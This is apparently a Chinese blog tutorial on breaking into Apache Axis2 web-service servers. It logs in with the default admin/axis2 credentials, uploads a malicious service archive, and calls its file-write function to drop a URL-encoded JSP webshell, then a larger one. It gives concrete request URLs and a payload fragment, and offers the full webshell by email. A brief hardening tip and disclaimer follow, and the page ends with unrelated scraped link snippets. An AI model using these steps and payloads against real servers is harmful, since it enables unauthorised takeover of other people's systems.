利用Axis2默认口令安全漏洞入侵WebService网站
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。
黑吧安全网Axis2默认口令安全弱点利用案例:
航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)
乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)
中国科学院网Web-services(axis2)系统任意代码执行
工具准备:
Axis2利用工具包: cat.arr
JSP一句话木马
服务器端一句话木马代码:
客户端提交代码:
your code
JSP大马
大马我就不发布出来了,如有需要可发我QQ邮箱2749958485@qq.com索要。
URL编码工具
我用的是小葵转码,也可以利用网上在线的转码工具
渗透流程:
第一步 ,确认目标WebService网站后台URL地址。
我在本地搭建的后台地址为 http://10.10.10.138:8080/axis2/axis2-admin/ , 按照webservice的部署经验,直接部署在根目录下的网站也比较多,则后台地址多为 http://*.*.*:8080/axis2-web/ 。点击Administration 进入Axis2后台登录界面,输入默认口令admin/axis2,若口令没有被更改则可成功进入后台管理界面。


第二步 ,点击左侧“Upload Service”上传cat.arr,这个arr包实际上是个中马,我们主要利用这个网马的获取web应用路径、写入文件这两个功能。
cat工具上传成功之后,点击左侧“Available Service”可以看到上传的service项“Cat”。
在客户端利用这个网马的getClassPath功能获取当前应用路径
http://10.10.10.137:8080/axis2/services/Cat/getClassPath 
利用文件写入功能往获取的web应用路径下写入服务器端JSP一句话木马,注意此处需要将一句话木马代码先转码成URL编码,另外在URL中添加内容的时候注意不准换行,复制黏贴时要特别注意。
http://10.10.10.137:8080/axis2/services/Cat/writeStringToFile?data=%253C%25if%28request.getParameter%28%25E2%2580%259Cf%25E2%2580%259D%29!%3Dnull%29%28new%2520java.io.Fil&file=/C:/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/webapps/axis2/1.jsp&encoding=utf-8&append=false
第三步 ,利用JSP一句话木马的客户端提交代码写入JSP大马。在提交表单中填入JSP大马代码,点击提交即可。此处注意自行修改客户端提交代码中的JSP一句话木马文件路径以及要写入的JSP大马文件名。
第四步 ,访问上传的大马,即可获得web应用服务器控制权限。
安全加固方法:
修改Axis2默认账户名与口令,具体位置在axis2中的conf.xml文档中,修改如下两行代码。
admin
axis2
【后记】:写本篇文章主要是想说明Axis2默认账户口令的危害,希望大家不要滥用文章中涉及到的渗透技术,共同建立一个良好的信息安全环境。
利用Axis2默认口令安全漏洞入侵WebService网站的更多相关文章
- 利用Axis2默认口令安全漏洞可入侵WebService网站
利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基 ...
- IPMI相关漏洞利用及WEB端默认口令登录漏洞
IPMI相关漏洞 0套件漏洞 使用0套件时,只需要Username,口令任意即可绕过身份鉴别执行指令.而且一般还有一个默认的账户admin或者ADMIN. 备注:IPMI是一套主机远程管理系统,可以远 ...
- 漏洞利用 Exploit---利用默认口令、IP假冒、应用漏洞
漏洞利用 编辑 讨论 本词条由“科普中国”科学百科词条编写与应用工作项目 审核 . 漏洞利用(英语:Exploit,本意为“利用”)是计算机安全术语,指的是利用程序中的某些漏洞,来得到计算机的控制权( ...
- tomcat 用AXIS2发布WebService 网站的方法
Axis2+tomcat7.0 实现webService 服务端发布与客户端的调用. Aixs2开发webService的方法有很多,在此只介绍一种比较简单的实现方法. 第一步:首先要下载开发所需要的 ...
- 如何扫描统计全国Telnet默认口令
如何扫描统计全国Telnet默认口令 zrools2016-01-21共339474人围观 ,发现 23 个不明物体系统安全终端安全 本文原创作者:zrools 本文中介绍的工具.技术带有一定的攻击性 ...
- 利用Ossim系统进行主机漏洞扫描
利用Ossim系统进行主机漏洞扫描 企业中查找漏洞要付出很大的努力,不能简单的在服务器上安装一个漏洞扫描软件那么简单,那样起不了多大作用.这并不是因为企业中拥有大量服务器和主机设备,这些服务器和设备又 ...
- 利用foo函数的Bof漏洞攻击:构造攻击字符串
利用foo函数的Bof漏洞攻击:构造攻击字符串 一.基础知识储备 objdump反汇编指令.gdb函数调试运行.Perl语言.|管道符 二.实验步骤 1. 通过反汇编了解程序功能及代码 ①反汇编查看文 ...
- 网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器 ...
- 利用AXIS2传递JSON数据
Axis2是目前比较流行的WebService引擎.WebService被应用在很多不同的场景.例如,可以使用WebService来发布服务端 Java类的方法,以便使用不同的客户端进行调用.这样可以 ...
随机推荐
- PAT_A1118#Birds in Forest
Source: PAT A1118 Birds in Forest (25 分) Description: Some scientists took pictures of thousands of ...
- kernel学习单
lock (spin_lock, mutex, rw_mutex/spinlock) waitqueue, tasklet, softIRQ, hardIRQ basic struct (atomic ...
- 01-Linux命令基础-第01天(命令基础,软件安装与卸载、磁盘管理)
01- Linux初步 最早一直是单道程序设计模型的操作系统 69年贝尔实验室决定开发多道程序设计模型的操作系统 Multics计划 (失败了) x86 IA(Intel Architecture ...
- 第三次训练 密码acmore
网站:CSUST7月23号 A题:大意是:一个N多边形,用红,绿,蓝三色给定点上色,要求划分成顶点颜色不同的三角形. 解析: 这道题是黑书上分治法的例题,还是比较巧的. 首先很容易发现当某种颜色的点只 ...
- [bzoj5118]Fib数列2_费马小定理_矩阵乘法
Fib数列2 bzoj-5118 题目大意:求Fib($2^n$). 注释:$1\le n\le 10^{15}$. 想法:开始一看觉得一定是道神题,多好的题面啊?结果...妈的,模数是质数,费马小定 ...
- javap命令
javap命令 学习了:https://www.cnblogs.com/frinder6/p/5440173.html javap命令查看java类的字节码: 对于synchronized块,可以显示 ...
- codechef Little Elephant and Bombs题解
The Little Elephant from the Zoo of Lviv currently is on the military mission. There are N enemy bui ...
- expdp impdp 数据库导入导出命令具体解释
一.创建逻辑文件夹,该命令不会在操作系统创建真正的文件夹.最好以system等管理员创建. create directory dpdata1 as 'd:\test\dump'; 二.查看管理理员文件 ...
- fastjson null 值处理
偶然用到fastjson转换json 在前台用js解析竟然某些字段没有,曾经用过gson.联想到是不是相似gson默认将null值不显示了,找了下资料果真如此 直接上代码吧 import java.u ...
- Anaconda安装第三方模块
Anaconda安装第三方模块 普通安装: 进去\Anaconda\Scripts目录,conda install 模块名 源码安装: 进去第三方模块目录,python install setup.p ...